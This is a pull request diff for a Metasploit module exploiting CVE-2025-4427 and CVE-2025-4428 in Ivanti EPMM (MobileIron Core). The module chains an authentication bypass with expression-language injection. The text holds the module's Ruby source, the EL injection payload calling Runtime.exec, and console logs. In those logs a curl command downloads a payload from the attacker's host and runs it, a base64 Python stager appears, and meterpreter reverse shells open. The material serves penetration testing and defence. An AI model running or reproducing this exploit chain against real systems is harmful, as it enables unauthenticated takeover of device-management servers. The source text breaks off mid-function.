### PR TITLE
Exploit module for CVE-2025-4427/CVE-2025-4428 - Ivanti EPMM (AKA MobileIron Core) Authentication Bypass to EL Injection

### DIFF
--- a/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
+++ b/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
@@ -24,42 +24,28 @@ No custom options exist for this module.
 ## Scenarios
 ### Ivanti EPMM (MobileIron Core) Linux Target
 ```
-msf6 > use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
-[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options 
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options
 
 Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, so
+                                         cks4, socks5, socks5h, http
+   RHOSTS     10.5.132.244     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
    RPORT      443              yes       The target port (TCP)
    SSL        true             yes       Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The base path to Ivanti EPMM
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+Payload options (python/meterpreter/reverse_tcp):
 
-   Name            Current Setting  Required  Description
-   ----            ---------------  --------  -----------
-   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
-   FETCH_SRVHOST                    no        Local IP to use for serving payload
-   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                    no        Local URI to use for serving payload
-   LHOST                            yes       The listen address (an interface may be specified)
-   LPORT           4444             yes       The listen port
-
-
-   When FETCH_FILELESS is false:
-
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_FILENAME      EUAqTWOdJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
-   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -72,51 +58,21 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set RHOSTS 192.168.181.148
-RHOSTS => 192.168.181.148
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set LHOST 192.168.181.129 
-LHOST => 192.168.181.129
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set FETCH_SRVPORT 9191
-FETCH_SRVPORT => 9191
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set VERBOSE true
-VERBOSE => true
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > check
-[*] Payload pt. 1/1: id
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
-[+] 192.168.181.148:443 - The target is vulnerable. Successfully executed command
 msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
-[*] Command to run on remote host: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw;chmod +x /var/tmp/lktEmYrRyAfw;/var/tmp/lktEmYrRyAfw&
-[*] Fetch handler listening on 192.168.181.129:9191
-[*] HTTP server started
-[*] Adding resource /rwwkKagVT2DQx25BSXklfw
-[*] Started reverse TCP handler on 192.168.181.129:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Payload pt. 1/1: id
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
-[+] The target is vulnerable. Successfully executed command
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
 [*] Attempting to execute payload
-[*] Payload pt. 1/3: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Client 192.168.181.148 requested /rwwkKagVT2DQx25BSXklfw
-[*] Sending payload to 192.168.181.148 (curl/7.29.0)
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
-[*] Payload pt. 2/3: chmod +x /var/tmp/lktEmYrRyAfw
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 2 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
-[*] Payload pt. 3/3: /var/tmp/lktEmYrRyAfw &
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('/var/tmp/lktEmYrRyAfw &').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Meterpreter session 1 opened (192.168.181.129:4444 -> 192.168.181.148:38980) at 2025-05-28 16:31:52 -0500
-[*] No command pt 3 response expected
-
-meterpreter > getuid 
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('python3 -c exec(__import__("base64").b64decode("ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVVFMUx4REFRUFRlL0lyY2tHRU83dG50WXJDRGlRVVFFMTV1SXRNbW9vV2tTa3F4V3hmOXVReGJuTU1PYmVmUG1ROC9laFlTamt4TWsvbTMweU1jaHdyYmxNWVdEVER6cEdkQ3JDM2pCMnVJdzJEZWdUYzEycUVyaGEvVlY3RXV6S0lGdStCSHY3Njl1WC9hUEQ5ZVhkeXp6aEhUV2dreVVrcVlXbldqT09yR3BHOExiMVZpbWpBR0dDVld3U1BBcGErZmhJaG9BVHp1R1RGOTJFZ2ZyQnpsUmNuRkRlQlFCNUFkZEJaN3FaNlQ2SXpZTWZiNXJBOWlBcFlxZG0xVk9uZnhYVDB1YUlWaEEwbnkyVUNEZDdBUEVTTXNIeExodGMxSkJadklmRXNrdS9qTDBCOGd3WHZBPScpWzBdKSkp"))').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Sending stage (24768 bytes) to 10.5.132.244
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.244:50322) at 2025-06-03 13:38:16 -0500
+meterpreter > sysinfo
+Computer        : ivanti.example.local
+OS              : Linux 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
 Server username: tomcat
-meterpreter > sysinfo 
-Computer     : core.mobileiron.local
-OS           : CentOS 7.6.1810 (Linux 3.10.0-1160.6.1.el7.x86_64)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
-meterpreter > 
+meterpreter > exit
+
 ```

--- a/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
+++ b/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
@@ -1,0 +1,122 @@
+## Vulnerable Application
+This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM,
+tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated
+access to an administrator web API endpoint, which allows for code execution via expression
+language injection. This module executes in the context of the 'tomcat' user. This module
+should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).
+
+## Testing
+To set up a test environment:
+1. Set up an Ivanti EPMM or MobileIron Core VM appliance.
+2. Configure basic networking and confirm that the web service on port 443 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `run`
+
+## Scenarios
+### Ivanti EPMM (MobileIron Core) Linux Target
+```
+msf6 > use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options 
+
+Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to Ivanti EPMM
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      EUAqTWOdJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set RHOSTS 192.168.181.148
+RHOSTS => 192.168.181.148
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set LHOST 192.168.181.129 
+LHOST => 192.168.181.129
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set FETCH_SRVPORT 9191
+FETCH_SRVPORT => 9191
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > check
+[*] Payload pt. 1/1: id
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
+[+] 192.168.181.148:443 - The target is vulnerable. Successfully executed command
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
+[*] Command to run on remote host: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw;chmod +x /var/tmp/lktEmYrRyAfw;/var/tmp/lktEmYrRyAfw&
+[*] Fetch handler listening on 192.168.181.129:9191
+[*] HTTP server started
+[*] Adding resource /rwwkKagVT2DQx25BSXklfw
+[*] Started reverse TCP handler on 192.168.181.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Payload pt. 1/1: id
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
+[+] The target is vulnerable. Successfully executed command
+[*] Attempting to execute payload
+[*] Payload pt. 1/3: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Client 192.168.181.148 requested /rwwkKagVT2DQx25BSXklfw
+[*] Sending payload to 192.168.181.148 (curl/7.29.0)
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
+[*] Payload pt. 2/3: chmod +x /var/tmp/lktEmYrRyAfw
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 2 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
+[*] Payload pt. 3/3: /var/tmp/lktEmYrRyAfw &
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('/var/tmp/lktEmYrRyAfw &').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Meterpreter session 1 opened (192.168.181.129:4444 -> 192.168.181.148:38980) at 2025-05-28 16:31:52 -0500
+[*] No command pt 3 response expected
+
+meterpreter > getuid 
+Server username: tomcat
+meterpreter > sysinfo 
+Computer     : core.mobileiron.local
+OS           : CentOS 7.6.1810 (Linux 3.10.0-1160.6.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
+++ b/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'CERT-EU', # Original discovery
-          'Sonny Macdonald & Piotr Bazydlo', # First published PoC
+          'Sonny Macdonald', # First Published PoC
+          'Piotr Bazydlo', # First published PoC
           'remmons-r7' # MSF Exploit
         ],
         'References' => [
@@ -40,17 +41,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2025-05-13',
         # Runs as the 'tomcat' user
         'Privileged' => false,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD],
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON], # Tested appliance has Python 3.4.9
         'DefaultTarget' => 0,
         'Targets' => [ [ 'Default', {} ] ],
-        'DefaultOptions' => {
-          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
-          'FETCH_WRITABLE_DIR' => '/var/tmp',
-          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
-          # Specifying x64 here to ensure a sane default
-          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
-        },
         'Notes' => {
           # Confirmed to work multiple times in a row and concurrently
           'Stability' => [CRASH_SAFE],
@@ -82,61 +76,25 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd)
-    # Since the execution context only supports one command at a time, split on fetch payload semicolons
-    commands = cmd.split(';')
-    resp = nil
+  def execute_command(command)
+    payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
 
-    commands.each_with_index do |command, index|
-      command = command.strip
-      next if command.empty?
+    vprint_status("Sending template payload: #{payload}")
 
-      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
-      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
-      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
-      # The expression language execution context doesn't like it unless there's a space, so we add one
-      command = command.gsub('&', ' &')
-
-      vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
-
-      # Non-blind payload reportedly being used in the wild, returns stdout in response body
-      payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
-
-      vprint_status("Sending template payload: #{payload}")
-
-      resp = send_request_cgi(
-        'method' => 'GET',
-        # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
-        'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
-        'vars_get' => {
-          'format' => payload
-        },
-        # Setting this timeout lower than the default, since the third request will not receive a response
-        # Per https://github.com/rapid7/metasploit-framework/issues/12004
-        'timeout' => 7.5
-      )
-
-      # The third fetch payload command (executing meterpreter) should hang and fail to respond
-      # If there's no response and it's not the third fetch payload, the exploit failed
-      if index != 2
-        unless resp
-          fail_with(Failure::Unknown, "Failed to execute command part #{index + 1}: #{command}")
-        end
-
-        vprint_status("Command part #{index + 1} response: #{resp.body}")
-
-      else
-        vprint_status('No command part 3 response expected')
-      end
-    end
-
-    resp
+    send_request_cgi(
+      'method' => 'GET',
+      # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
+      'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
+      'vars_get' => {
+        'format' => payload
+      }
+    )
   end
 
   def exploit
-    # We pass the encoded payload to execute_command
-    # That will split it up into three commands to execute, and it'll also handle error conditions
     vprint_status('Attempting to execute payload')
-    execute_command(payload.encoded)
+    base64_payload = Base64.urlsafe_encode64(payload.encoded)
+    cmd = "python3 -c exec(__import__(\"base64\").b64decode(\"#{base64_payload}\"))"
+    execute_command(cmd)
   end
 end

--- a/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
+++ b/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # The expression language execution context doesn't like it unless there's a space, so we add one
       command = command.gsub('&', ' &')
 
-      vprint_status("Payload pt. #{index + 1}/#{commands.length}: #{command}")
+      vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
 
       # Non-blind payload reportedly being used in the wild, returns stdout in response body
       payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
@@ -120,13 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
       # If there's no response and it's not the third fetch payload, the exploit failed
       if index != 2
         unless resp
-          fail_with(Failure::Unknown, "Failed to execute command pt #{index + 1}: #{command}")
+          fail_with(Failure::Unknown, "Failed to execute command part #{index + 1}: #{command}")
         end
 
-        vprint_status("Command pt #{index + 1} response: #{resp.body}")
+        vprint_status("Command part #{index + 1} response: #{resp.body}")
 
       else
-        vprint_status('No command pt 3 response expected')
+        vprint_status('No command part 3 response expected')
       end
     end
 

--- a/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
+++ b/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM,
+          tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated
+          access to an administrator web API endpoint, which allows for code execution via expression
+          language injection. This module executes in the context of the 'tomcat' user. This module
+          should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'CERT-EU', # Original discovery
+          'Sonny Macdonald & Piotr Bazydlo', # First published PoC
+          'remmons-r7' # MSF Exploit
+        ],
+        'References' => [
+          ['CVE', '2025-4427'],
+          ['CVE', '2025-4428'],
+          # Advisory
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US'],
+          # First published PoC
+          ['URL', 'https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-EPMM-CVE-2025-4427-CVE-2025-4428'],
+          # Non-blind payload
+          ['URL', 'https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability']
+        ],
+        'DisclosureDate' => '2025-05-13',
+        # Runs as the 'tomcat' user
+        'Privileged' => false,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'DefaultTarget' => 0,
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
+          # Specifying x64 here to ensure a sane default
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+        },
+        'Notes' => {
+          # Confirmed to work multiple times in a row and concurrently
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The base path to Ivanti EPMM', '/']),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true])
+      ]
+    )
+  end
+
+  def check
+    # Execute 'id' to check if target is vulnerable (version check via exploitation, best known approach)
+    resp = execute_command('id')
+    return CheckCode::Unknown('Failed to get a response from the target') unless resp
+
+    # The response body format will vary across versions, so check for presence of 'id' output
+    if resp.body.include?('uid=') && resp.body.include?('gid=')
+      return CheckCode::Vulnerable('Successfully executed command')
+    else
+      return CheckCode::Safe('Target does not appear to be vulnerable - command output not returned')
+    end
+  end
+
+  def execute_command(cmd)
+    # Since the execution context only supports one command at a time, split on fetch payload semicolons
+    commands = cmd.split(';')
+    resp = nil
+
+    commands.each_with_index do |command, index|
+      command = command.strip
+      next if command.empty?
+
+      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
+      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
+      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
+      # The expression language execution context doesn't like it unless there's a space, so we add one
+      command = command.gsub('&', ' &')
+
+      vprint_status("Payload pt. #{index + 1}/#{commands.length}: #{command}")
+
+      # Non-blind payload reportedly being used in the wild, returns stdout in response body
